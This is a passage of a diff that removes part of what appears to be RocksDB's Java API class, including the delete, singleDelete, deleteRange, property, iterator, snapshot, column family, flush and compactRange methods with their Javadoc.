-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param key Key to delete within database
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   *
-   * @deprecated Use {@link #delete(ColumnFamilyHandle, byte[])}
-   */
-  @Deprecated
-  public void remove(final ColumnFamilyHandle columnFamilyHandle,
-      final byte[] key) throws RocksDBException {
-    delete(columnFamilyHandle, key);
-  }
-
-  /**
-   * Delete the database entry (if any) for "key".  Returns OK on
-   * success, and a non-OK status on error.  It is not an error if "key"
-   * did not exist in the database.
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param key Key to delete within database
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void delete(final ColumnFamilyHandle columnFamilyHandle,
-                     final byte[] key) throws RocksDBException {
-    delete(nativeHandle_, key, 0, key.length, columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * Remove the database entry (if any) for "key".  Returns OK on
-   * success, and a non-OK status on error.  It is not an error if "key"
-   * did not exist in the database.
-   *
-   * @param writeOpt WriteOptions to be used with delete operation
-   * @param key Key to delete within database
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   *
-   * @deprecated Use {@link #delete(WriteOptions, byte[])}
-   */
-  @Deprecated
-  public void remove(final WriteOptions writeOpt, final byte[] key)
-      throws RocksDBException {
-    delete(writeOpt, key);
-  }
-
-  /**
-   * Delete the database entry (if any) for "key".  Returns OK on
-   * success, and a non-OK status on error.  It is not an error if "key"
-   * did not exist in the database.
-   *
-   * @param writeOpt WriteOptions to be used with delete operation
-   * @param key Key to delete within database
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void delete(final WriteOptions writeOpt, final byte[] key)
-      throws RocksDBException {
-    delete(nativeHandle_, writeOpt.nativeHandle_, key, 0, key.length);
-  }
-
-  /**
-   * Remove the database entry (if any) for "key".  Returns OK on
-   * success, and a non-OK status on error.  It is not an error if "key"
-   * did not exist in the database.
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param writeOpt WriteOptions to be used with delete operation
-   * @param key Key to delete within database
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   *
-   * @deprecated Use {@link #delete(ColumnFamilyHandle, WriteOptions, byte[])}
-   */
-  @Deprecated
-  public void remove(final ColumnFamilyHandle columnFamilyHandle,
-      final WriteOptions writeOpt, final byte[] key)
-      throws RocksDBException {
-    delete(columnFamilyHandle, writeOpt, key);
-  }
-
-  /**
-   * Delete the database entry (if any) for "key".  Returns OK on
-   * success, and a non-OK status on error.  It is not an error if "key"
-   * did not exist in the database.
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param writeOpt WriteOptions to be used with delete operation
-   * @param key Key to delete within database
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void delete(final ColumnFamilyHandle columnFamilyHandle,
-                     final WriteOptions writeOpt, final byte[] key)
-      throws RocksDBException {
-    delete(nativeHandle_, writeOpt.nativeHandle_, key, 0, key.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * Remove the database entry for {@code key}. Requires that the key exists
-   * and was not overwritten. It is not an error if the key did not exist
-   * in the database.
-   *
-   * If a key is overwritten (by calling {@link #put(byte[], byte[])} multiple
-   * times), then the result of calling SingleDelete() on this key is undefined.
-   * SingleDelete() only behaves correctly if there has been only one Put()
-   * for this key since the previous call to SingleDelete() for this key.
-   *
-   * This feature is currently an experimental performance optimization
-   * for a very specific workload. It is up to the caller to ensure that
-   * SingleDelete is only used for a key that is not deleted using Delete() or
-   * written using Merge(). Mixing SingleDelete operations with Deletes and
-   * Merges can result in undefined behavior.
-   *
-   * @param key Key to delete within database
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *     native library.
-   */
-  @Experimental("Performance optimization for a very specific workload")
-  public void singleDelete(final byte[] key) throws RocksDBException {
-    singleDelete(nativeHandle_, key, key.length);
-  }
-
-  /**
-   * Remove the database entry for {@code key}. Requires that the key exists
-   * and was not overwritten. It is not an error if the key did not exist
-   * in the database.
-   *
-   * If a key is overwritten (by calling {@link #put(byte[], byte[])} multiple
-   * times), then the result of calling SingleDelete() on this key is undefined.
-   * SingleDelete() only behaves correctly if there has been only one Put()
-   * for this key since the previous call to SingleDelete() for this key.
-   *
-   * This feature is currently an experimental performance optimization
-   * for a very specific workload. It is up to the caller to ensure that
-   * SingleDelete is only used for a key that is not deleted using Delete() or
-   * written using Merge(). Mixing SingleDelete operations with Deletes and
-   * Merges can result in undefined behavior.
-   *
-   * @param columnFamilyHandle The column family to delete the key from
-   * @param key Key to delete within database
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *     native library.
-   */
-  @Experimental("Performance optimization for a very specific workload")
-  public void singleDelete(final ColumnFamilyHandle columnFamilyHandle,
-      final byte[] key) throws RocksDBException {
-    singleDelete(nativeHandle_, key, key.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * Remove the database entry for {@code key}. Requires that the key exists
-   * and was not overwritten. It is not an error if the key did not exist
-   * in the database.
-   *
-   * If a key is overwritten (by calling {@link #put(byte[], byte[])} multiple
-   * times), then the result of calling SingleDelete() on this key is undefined.
-   * SingleDelete() only behaves correctly if there has been only one Put()
-   * for this key since the previous call to SingleDelete() for this key.
-   *
-   * This feature is currently an experimental performance optimization
-   * for a very specific workload. It is up to the caller to ensure that
-   * SingleDelete is only used for a key that is not deleted using Delete() or
-   * written using Merge(). Mixing SingleDelete operations with Deletes and
-   * Merges can result in undefined behavior.
-   *
-   * Note: consider setting {@link WriteOptions#setSync(boolean)} true.
-   *
-   * @param writeOpt Write options for the delete
-   * @param key Key to delete within database
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *     native library.
-   */
-  @Experimental("Performance optimization for a very specific workload")
-  public void singleDelete(final WriteOptions writeOpt, final byte[] key)
-      throws RocksDBException {
-    singleDelete(nativeHandle_, writeOpt.nativeHandle_, key, key.length);
-  }
-
-  /**
-   * Remove the database entry for {@code key}. Requires that the key exists
-   * and was not overwritten. It is not an error if the key did not exist
-   * in the database.
-   *
-   * If a key is overwritten (by calling {@link #put(byte[], byte[])} multiple
-   * times), then the result of calling SingleDelete() on this key is undefined.
-   * SingleDelete() only behaves correctly if there has been only one Put()
-   * for this key since the previous call to SingleDelete() for this key.
-   *
-   * This feature is currently an experimental performance optimization
-   * for a very specific workload. It is up to the caller to ensure that
-   * SingleDelete is only used for a key that is not deleted using Delete() or
-   * written using Merge(). Mixing SingleDelete operations with Deletes and
-   * Merges can result in undefined behavior.
-   *
-   * Note: consider setting {@link WriteOptions#setSync(boolean)} true.
-   *
-   * @param columnFamilyHandle The column family to delete the key from
-   * @param writeOpt Write options for the delete
-   * @param key Key to delete within database
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *     native library.
-   */
-  @Experimental("Performance optimization for a very specific workload")
-  public void singleDelete(final ColumnFamilyHandle columnFamilyHandle,
-      final WriteOptions writeOpt, final byte[] key) throws RocksDBException {
-    singleDelete(nativeHandle_, writeOpt.nativeHandle_, key, key.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * DB implements can export properties about their state
-   * via this method on a per column family level.
-   *
-   * <p>If {@code property} is a valid property understood by this DB
-   * implementation, fills {@code value} with its current value and
-   * returns true. Otherwise returns false.</p>
-   *
-   * <p>Valid property names include:
-   * <ul>
-   * <li>"rocksdb.num-files-at-level&lt;N&gt;" - return the number of files at
-   * level &lt;N&gt;, where &lt;N&gt; is an ASCII representation of a level
-   * number (e.g. "0").</li>
-   * <li>"rocksdb.stats" - returns a multi-line string that describes statistics
-   *     about the internal operation of the DB.</li>
-   * <li>"rocksdb.sstables" - returns a multi-line string that describes all
-   *    of the sstables that make up the db contents.</li>
-   * </ul>
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param property to be fetched. See above for examples
-   * @return property value
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public String getProperty(final ColumnFamilyHandle columnFamilyHandle,
-      final String property) throws RocksDBException {
-    return getProperty0(nativeHandle_, columnFamilyHandle.nativeHandle_,
-        property, property.length());
-  }
-
-  /**
-   * Removes the database entries in the range ["beginKey", "endKey"), i.e.,
-   * including "beginKey" and excluding "endKey". a non-OK status on error. It
-   * is not an error if no keys exist in the range ["beginKey", "endKey").
-   *
-   * Delete the database entry (if any) for "key". Returns OK on success, and a
-   * non-OK status on error. It is not an error if "key" did not exist in the
-   * database.
-   *
-   * @param beginKey
-   *          First key to delete within database (included)
-   * @param endKey
-   *          Last key to delete within database (excluded)
-   *
-   * @throws RocksDBException
-   *           thrown if error happens in underlying native library.
-   */
-  public void deleteRange(final byte[] beginKey, final byte[] endKey) throws RocksDBException {
-    deleteRange(nativeHandle_, beginKey, 0, beginKey.length, endKey, 0, endKey.length);
-  }
-
-  /**
-   * Removes the database entries in the range ["beginKey", "endKey"), i.e.,
-   * including "beginKey" and excluding "endKey". a non-OK status on error. It
-   * is not an error if no keys exist in the range ["beginKey", "endKey").
-   *
-   * Delete the database entry (if any) for "key". Returns OK on success, and a
-   * non-OK status on error. It is not an error if "key" did not exist in the
-   * database.
-   *
-   * @param columnFamilyHandle
-   *          {@link org.rocksdb.ColumnFamilyHandle} instance
-   * @param beginKey
-   *          First key to delete within database (included)
-   * @param endKey
-   *          Last key to delete within database (excluded)
-   *
-   * @throws RocksDBException
-   *           thrown if error happens in underlying native library.
-   */
-  public void deleteRange(final ColumnFamilyHandle columnFamilyHandle, final byte[] beginKey,
-      final byte[] endKey) throws RocksDBException {
-    deleteRange(nativeHandle_, beginKey, 0, beginKey.length, endKey, 0, endKey.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * Removes the database entries in the range ["beginKey", "endKey"), i.e.,
-   * including "beginKey" and excluding "endKey". a non-OK status on error. It
-   * is not an error if no keys exist in the range ["beginKey", "endKey").
-   *
-   * Delete the database entry (if any) for "key". Returns OK on success, and a
-   * non-OK status on error. It is not an error if "key" did not exist in the
-   * database.
-   *
-   * @param writeOpt
-   *          WriteOptions to be used with delete operation
-   * @param beginKey
-   *          First key to delete within database (included)
-   * @param endKey
-   *          Last key to delete within database (excluded)
-   *
-   * @throws RocksDBException
-   *           thrown if error happens in underlying native library.
-   */
-  public void deleteRange(final WriteOptions writeOpt, final byte[] beginKey, final byte[] endKey)
-      throws RocksDBException {
-    deleteRange(nativeHandle_, writeOpt.nativeHandle_, beginKey, 0, beginKey.length, endKey, 0,
-        endKey.length);
-  }
-
-  /**
-   * Removes the database entries in the range ["beginKey", "endKey"), i.e.,
-   * including "beginKey" and excluding "endKey". a non-OK status on error. It
-   * is not an error if no keys exist in the range ["beginKey", "endKey").
-   *
-   * Delete the database entry (if any) for "key". Returns OK on success, and a
-   * non-OK status on error. It is not an error if "key" did not exist in the
-   * database.
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param writeOpt
-   *          WriteOptions to be used with delete operation
-   * @param beginKey
-   *          First key to delete within database (included)
-   * @param endKey
-   *          Last key to delete within database (excluded)
-   *
-   * @throws RocksDBException
-   *           thrown if error happens in underlying native library.
-   */
-  public void deleteRange(final ColumnFamilyHandle columnFamilyHandle, final WriteOptions writeOpt,
-      final byte[] beginKey, final byte[] endKey) throws RocksDBException {
-    deleteRange(nativeHandle_, writeOpt.nativeHandle_, beginKey, 0, beginKey.length, endKey, 0,
-        endKey.length, columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * DB implementations can export properties about their state
-   * via this method.  If "property" is a valid property understood by this
-   * DB implementation, fills "*value" with its current value and returns
-   * true.  Otherwise returns false.
-   *
-   * <p>Valid property names include:
-   * <ul>
-   * <li>"rocksdb.num-files-at-level&lt;N&gt;" - return the number of files at
-   * level &lt;N&gt;, where &lt;N&gt; is an ASCII representation of a level
-   * number (e.g. "0").</li>
-   * <li>"rocksdb.stats" - returns a multi-line string that describes statistics
-   *     about the internal operation of the DB.</li>
-   * <li>"rocksdb.sstables" - returns a multi-line string that describes all
-   *    of the sstables that make up the db contents.</li>
-   *</ul>
-   *
-   * @param property to be fetched. See above for examples
-   * @return property value
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public String getProperty(final String property) throws RocksDBException {
-    return getProperty0(nativeHandle_, property, property.length());
-  }
-
-  /**
-   * <p> Similar to GetProperty(), but only works for a subset of properties
-   * whose return value is a numerical value. Return the value as long.</p>
-   *
-   * <p><strong>Note</strong>: As the returned property is of type
-   * {@code uint64_t} on C++ side the returning value can be negative
-   * because Java supports in Java 7 only signed long values.</p>
-   *
-   * <p><strong>Java 7</strong>: To mitigate the problem of the non
-   * existent unsigned long tpye, values should be encapsulated using
-   * {@link java.math.BigInteger} to reflect the correct value. The correct
-   * behavior is guaranteed if {@code 2^64} is added to negative values.</p>
-   *
-   * <p><strong>Java 8</strong>: In Java 8 the value should be treated as
-   * unsigned long using provided methods of type {@link Long}.</p>
-   *
-   * @param property to be fetched.
-   *
-   * @return numerical property value.
-   *
-   * @throws RocksDBException if an error happens in the underlying native code.
-   */
-  public long getLongProperty(final String property) throws RocksDBException {
-    return getLongProperty(nativeHandle_, property, property.length());
-  }
-
-  /**
-   * <p> Similar to GetProperty(), but only works for a subset of properties
-   * whose return value is a numerical value. Return the value as long.</p>
-   *
-   * <p><strong>Note</strong>: As the returned property is of type
-   * {@code uint64_t} on C++ side the returning value can be negative
-   * because Java supports in Java 7 only signed long values.</p>
-   *
-   * <p><strong>Java 7</strong>: To mitigate the problem of the non
-   * existent unsigned long tpye, values should be encapsulated using
-   * {@link java.math.BigInteger} to reflect the correct value. The correct
-   * behavior is guaranteed if {@code 2^64} is added to negative values.</p>
-   *
-   * <p><strong>Java 8</strong>: In Java 8 the value should be treated as
-   * unsigned long using provided methods of type {@link Long}.</p>
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param property to be fetched.
-   *
-   * @return numerical property value
-   *
-   * @throws RocksDBException if an error happens in the underlying native code.
-   */
-  public long getLongProperty(final ColumnFamilyHandle columnFamilyHandle,
-      final String property) throws RocksDBException {
-    return getLongProperty(nativeHandle_, columnFamilyHandle.nativeHandle_,
-        property, property.length());
-  }
-
-  /**
-   * <p>Return a heap-allocated iterator over the contents of the
-   * database. The result of newIterator() is initially invalid
-   * (caller must call one of the Seek methods on the iterator
-   * before using it).</p>
-   *
-   * <p>Caller should close the iterator when it is no longer needed.
-   * The returned iterator should be closed before this db is closed.
-   * </p>
-   *
-   * @return instance of iterator object.
-   */
-  public RocksIterator newIterator() {
-    return new RocksIterator(this, iterator(nativeHandle_));
-  }
-
-  /**
-   * <p>Return a heap-allocated iterator over the contents of the
-   * database. The result of newIterator() is initially invalid
-   * (caller must call one of the Seek methods on the iterator
-   * before using it).</p>
-   *
-   * <p>Caller should close the iterator when it is no longer needed.
-   * The returned iterator should be closed before this db is closed.
-   * </p>
-   *
-   * @param readOptions {@link ReadOptions} instance.
-   * @return instance of iterator object.
-   */
-  public RocksIterator newIterator(final ReadOptions readOptions) {
-    return new RocksIterator(this, iterator(nativeHandle_,
-        readOptions.nativeHandle_));
-  }
-
-   /**
-   * <p>Return a handle to the current DB state. Iterators created with
-   * this handle will all observe a stable snapshot of the current DB
-   * state. The caller must call ReleaseSnapshot(result) when the
-   * snapshot is no longer needed.</p>
-   *
-   * <p>nullptr will be returned if the DB fails to take a snapshot or does
-   * not support snapshot.</p>
-   *
-   * @return Snapshot {@link Snapshot} instance
-   */
-  public Snapshot getSnapshot() {
-    long snapshotHandle = getSnapshot(nativeHandle_);
-    if (snapshotHandle != 0) {
-      return new Snapshot(snapshotHandle);
-    }
-    return null;
-  }
-
-  /**
-   * Release a previously acquired snapshot.  The caller must not
-   * use "snapshot" after this call.
-   *
-   * @param snapshot {@link Snapshot} instance
-   */
-  public void releaseSnapshot(final Snapshot snapshot) {
-    if (snapshot != null) {
-      releaseSnapshot(nativeHandle_, snapshot.nativeHandle_);
-    }
-  }
-
-  /**
-   * <p>Return a heap-allocated iterator over the contents of the
-   * database. The result of newIterator() is initially invalid
-   * (caller must call one of the Seek methods on the iterator
-   * before using it).</p>
-   *
-   * <p>Caller should close the iterator when it is no longer needed.
-   * The returned iterator should be closed before this db is closed.
-   * </p>
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @return instance of iterator object.
-   */
-  public RocksIterator newIterator(
-      final ColumnFamilyHandle columnFamilyHandle) {
-    return new RocksIterator(this, iteratorCF(nativeHandle_,
-        columnFamilyHandle.nativeHandle_));
-  }
-
-  /**
-   * <p>Return a heap-allocated iterator over the contents of the
-   * database. The result of newIterator() is initially invalid
-   * (caller must call one of the Seek methods on the iterator
-   * before using it).</p>
-   *
-   * <p>Caller should close the iterator when it is no longer needed.
-   * The returned iterator should be closed before this db is closed.
-   * </p>
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param readOptions {@link ReadOptions} instance.
-   * @return instance of iterator object.
-   */
-  public RocksIterator newIterator(final ColumnFamilyHandle columnFamilyHandle,
-      final ReadOptions readOptions) {
-    return new RocksIterator(this, iteratorCF(nativeHandle_,
-        columnFamilyHandle.nativeHandle_, readOptions.nativeHandle_));
-  }
-
-  /**
-   * Returns iterators from a consistent database state across multiple
-   * column families. Iterators are heap allocated and need to be deleted
-   * before the db is deleted
-   *
-   * @param columnFamilyHandleList {@link java.util.List} containing
-   *     {@link org.rocksdb.ColumnFamilyHandle} instances.
-   * @return {@link java.util.List} containing {@link org.rocksdb.RocksIterator}
-   *     instances
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public List<RocksIterator> newIterators(
-      final List<ColumnFamilyHandle> columnFamilyHandleList)
-      throws RocksDBException {
-    return newIterators(columnFamilyHandleList, new ReadOptions());
-  }
-
-  /**
-   * Returns iterators from a consistent database state across multiple
-   * column families. Iterators are heap allocated and need to be deleted
-   * before the db is deleted
-   *
-   * @param columnFamilyHandleList {@link java.util.List} containing
-   *     {@link org.rocksdb.ColumnFamilyHandle} instances.
-   * @param readOptions {@link ReadOptions} instance.
-   * @return {@link java.util.List} containing {@link org.rocksdb.RocksIterator}
-   *     instances
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public List<RocksIterator> newIterators(
-      final List<ColumnFamilyHandle> columnFamilyHandleList,
-      final ReadOptions readOptions) throws RocksDBException {
-
-    final long[] columnFamilyHandles = new long[columnFamilyHandleList.size()];
-    for (int i = 0; i < columnFamilyHandleList.size(); i++) {
-      columnFamilyHandles[i] = columnFamilyHandleList.get(i).nativeHandle_;
-    }
-
-    final long[] iteratorRefs = iterators(nativeHandle_, columnFamilyHandles,
-        readOptions.nativeHandle_);
-
-    final List<RocksIterator> iterators = new ArrayList<>(
-        columnFamilyHandleList.size());
-    for (int i=0; i<columnFamilyHandleList.size(); i++){
-      iterators.add(new RocksIterator(this, iteratorRefs[i]));
-    }
-    return iterators;
-  }
-
-  /**
-   * Gets the handle for the default column family
-   *
-   * @return The handle of the default column family
-   */
-  public ColumnFamilyHandle getDefaultColumnFamily() {
-    ColumnFamilyHandle cfHandle = new ColumnFamilyHandle(this,
-        getDefaultColumnFamily(nativeHandle_));
-    cfHandle.disOwnNativeHandle();
-    return cfHandle;
-  }
-
-  /**
-   * Creates a new column family with the name columnFamilyName and
-   * allocates a ColumnFamilyHandle within an internal structure.
-   * The ColumnFamilyHandle is automatically disposed with DB disposal.
-   *
-   * @param columnFamilyDescriptor column family to be created.
-   * @return {@link org.rocksdb.ColumnFamilyHandle} instance.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public ColumnFamilyHandle createColumnFamily(
-      final ColumnFamilyDescriptor columnFamilyDescriptor)
-      throws RocksDBException {
-    return new ColumnFamilyHandle(this, createColumnFamily(nativeHandle_,
-        columnFamilyDescriptor.columnFamilyName(),
-        columnFamilyDescriptor.columnFamilyOptions().nativeHandle_));
-  }
-
-  /**
-   * Drops the column family identified by columnFamilyName. Internal
-   * handles to this column family will be disposed. If the column family
-   * is not known removal will fail.
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void dropColumnFamily(final ColumnFamilyHandle columnFamilyHandle)
-      throws RocksDBException, IllegalArgumentException {
-    // throws RocksDBException if something goes wrong
-    dropColumnFamily(nativeHandle_, columnFamilyHandle.nativeHandle_);
-    // After the drop the native handle is not valid anymore
-    columnFamilyHandle.disOwnNativeHandle();
-  }
-
-  /**
-   * <p>Flush all memory table data.</p>
-   *
-   * <p>Note: it must be ensured that the FlushOptions instance
-   * is not GC'ed before this method finishes. If the wait parameter is
-   * set to false, flush processing is asynchronous.</p>
-   *
-   * @param flushOptions {@link org.rocksdb.FlushOptions} instance.
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public void flush(final FlushOptions flushOptions)
-      throws RocksDBException {
-    flush(nativeHandle_, flushOptions.nativeHandle_);
-  }
-
-  /**
-   * <p>Flush all memory table data.</p>
-   *
-   * <p>Note: it must be ensured that the FlushOptions instance
-   * is not GC'ed before this method finishes. If the wait parameter is
-   * set to false, flush processing is asynchronous.</p>
-   *
-   * @param flushOptions {@link org.rocksdb.FlushOptions} instance.
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle} instance.
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public void flush(final FlushOptions flushOptions,
-      final ColumnFamilyHandle columnFamilyHandle) throws RocksDBException {
-    flush(nativeHandle_, flushOptions.nativeHandle_,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * <p>Range compaction of database.</p>
-   * <p><strong>Note</strong>: After the database has been compacted,
-   * all data will have been pushed down to the last level containing
-   * any data.</p>
-   *
-   * <p><strong>See also</strong></p>
-   * <ul>
-   * <li>{@link #compactRange(boolean, int, int)}</li>
-   * <li>{@link #compactRange(byte[], byte[])}</li>
-   * <li>{@link #compactRange(byte[], byte[], boolean, int, int)}</li>
-   * </ul>
-   *
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public void compactRange() throws RocksDBException {
-    compactRange0(nativeHandle_, false, -1, 0);
-  }
-
-  /**
-   * <p>Range compaction of database.</p>
-   * <p><strong>Note</strong>: After the database has been compacted,
-   * all data will have been pushed down to the last level containing
-   * any data.</p>
-   *
-   * <p><strong>See also</strong></p>
-   * <ul>
-   * <li>{@link #compactRange()}</li>
-   * <li>{@link #compactRange(boolean, int, int)}</li>
-   * <li>{@link #compactRange(byte[], byte[], boolean, int, int)}</li>
-   * </ul>
-   *
-   * @param begin start of key range (included in range)
-   * @param end end of key range (excluded from range)
-   *
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public void compactRange(final byte[] begin, final byte[] end)
-      throws RocksDBException {
-    compactRange0(nativeHandle_, begin, begin.length, end,
-        end.length, false, -1, 0);
-  }
-
-  /**
-   * <p>Range compaction of database.</p>
-   * <p><strong>Note</strong>: After the database has been compacted,
-   * all data will have been pushed down to the last level containing
-   * any data.</p>
-   *
-   * <p>Compaction outputs should be placed in options.db_paths
-   * [target_path_id]. Behavior is undefined if target_path_id is
-   * out of range.</p>
-   *
-   * <p><strong>See also</strong></p>
-   * <ul>
-   * <li>{@link #compactRange()}</li>
-   * <li>{@link #compactRange(byte[], byte[])}</li>
-   * <li>{@link #compactRange(byte[], byte[], boolean, int, int)}</li>
-   * </ul>
-   *
-   * @param reduce_level reduce level after compaction
-   * @param target_level target level to compact to
-   * @param target_path_id the target path id of output path
-   *
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public void compactRange(final boolean reduce_level,
-      final int target_level, final int target_path_id)
-      throws RocksDBException {
-    compactRange0(nativeHandle_, reduce_level,
-        target_level, target_path_id);
-  }
-
-
-  /**
-   * <p>Range compaction of database.</p>
-   * <p><strong>Note</strong>: After the database has been compacted,
-   * all data will have been pushed down to the last level containing
-   * any data.</p>
-   *
-   * <p>Compaction outputs should be placed in options.db_paths
-   * [target_path_id]. Behavior is undefined if target_path_id is
-   * out of range.</p>
-   *
-   * <p><strong>See also</strong></p>
-   * <ul>
-   * <li>{@link #compactRange()}</li>
-   * <li>{@link #compactRange(boolean, int, int)}</li>
-   * <li>{@link #compactRange(byte[], byte[])}</li>
-   * </ul>
-   *
-   * @param begin start of key range (included in range)
-   * @param end end of key range (excluded from range)
-   * @param reduce_level reduce level after compaction
-   * @param target_level target level to compact to
-   * @param target_path_id the target path id of output path
-   *
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public void compactRange(final byte[] begin, final byte[] end,
-      final boolean reduce_level, final int target_level,
-      final int target_path_id) throws RocksDBException {
-    compactRange0(nativeHandle_, begin, begin.length, end, end.length,
-        reduce_level, target_level, target_path_id);
-  }
-
-  /**
-   * <p>Range compaction of column family.</p>
-   * <p><strong>Note</strong>: After the database has been compacted,
-   * all data will have been pushed down to the last level containing
-   * any data.</p>
-   *
-   * <p><strong>See also</strong></p>
-   * <ul>
-   * <li>
-   *   {@link #compactRange(ColumnFamilyHandle, boolean, int, int)}
-   * </li>
-   * <li>
-   *   {@link #compactRange(ColumnFamilyHandle, byte[], byte[])}
-   * </li>
-   * <li>
-   *   {@link #compactRange(ColumnFamilyHandle, byte[], byte[],
-   *   boolean, int, int)}
-   * </li>
-   * </ul>
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance.
-   *
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public void compactRange(final ColumnFamilyHandle columnFamilyHandle)
-      throws RocksDBException {
-    compactRange(nativeHandle_, false, -1, 0,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * <p>Range compaction of column family.</p>
-   * <p><strong>Note</strong>: After the database has been compacted,
-   * all data will have been pushed down to the last level containing
-   * any data.</p>
-   *
-   * <p><strong>See also</strong></p>
-   * <ul>
-   * <li>{@link #compactRange(ColumnFamilyHandle)}</li>
-   * <li>
-   *   {@link #compactRange(ColumnFamilyHandle, boolean, int, int)}
-   * </li>
-   * <li>
-   *   {@link #compactRange(ColumnFamilyHandle, byte[], byte[],
-   *   boolean, int, int)}
-   * </li>
-   * </ul>
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance.
-   * @param begin start of key range (included in range)
-   * @param end end of key range (excluded from range)
-   *
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public void compactRange(final ColumnFamilyHandle columnFamilyHandle,
-      final byte[] begin, final byte[] end) throws RocksDBException {
-    compactRange(nativeHandle_, begin, begin.length, end, end.length,
-        false, -1, 0, columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * <p>Range compaction of column family.</p>
-   * <p><strong>Note</strong>: After the database has been compacted,
-   * all data will have been pushed down to the last level containing
-   * any data.</p>
-   *
-   * <p>Compaction outputs should be placed in options.db_paths
-   * [target_path_id]. Behavior is undefined if target_path_id is
-   * out of range.</p>
-   *
-   * <p><strong>See also</strong></p>
-   * <ul>
-   * <li>{@link #compactRange(ColumnFamilyHandle)}</li>
-   * <li>
-   *   {@link #compactRange(ColumnFamilyHandle, byte[], byte[])}
-   * </li>
-   * <li>
-   *   {@link #compactRange(ColumnFamilyHandle, byte[], byte[],
-   *   boolean, int, int)}
-   * </li>
-   * </ul>
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance.
-   * @param reduce_level reduce level after compaction
-   * @param target_level target level to compact to
-   * @param target_path_id the target path id of output path
-   *
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public void compactRange(final ColumnFamilyHandle columnFamilyHandle,
-      final boolean reduce_level, final int target_level,
-      final int target_path_id) throws RocksDBException {
-    compactRange(nativeHandle_, reduce_level, target_level,
-        target_path_id, columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * <p>Range compaction of column family.</p>
-   * <p><strong>Note</strong>: After the database has been compacted,
-   * all data will have been pushed down to the last level containing
-   * any data.</p>
-   *
-   * <p>Compaction outputs should be placed in options.db_paths
-   * [target_path_id]. Behavior is undefined if target_path_id is
-   * out of range.</p>
-   *
-   * <p><strong>See also</strong></p>
-   * <ul>
-   * <li>{@link #compactRange(ColumnFamilyHandle)}</li>
-   * <li>
-   *   {@link #compactRange(ColumnFamilyHandle, boolean, int, int)}
-   * </li>
-   * <li>
-   *   {@link #compactRange(ColumnFamilyHandle, byte[], byte[])}
-   * </li>
-   * </ul>
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance.
-   * @param begin start of key range (included in range)
-   * @param end end of key range (excluded from range)
-   * @param reduce_level reduce level after compaction
-   * @param target_level target level to compact to
-   * @param target_path_id the target path id of output path
-   *
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public void compactRange(final ColumnFamilyHandle columnFamilyHandle,
-      final byte[] begin, final byte[] end, final boolean reduce_level,
-      final int target_level, final int target_path_id)
-      throws RocksDBException {
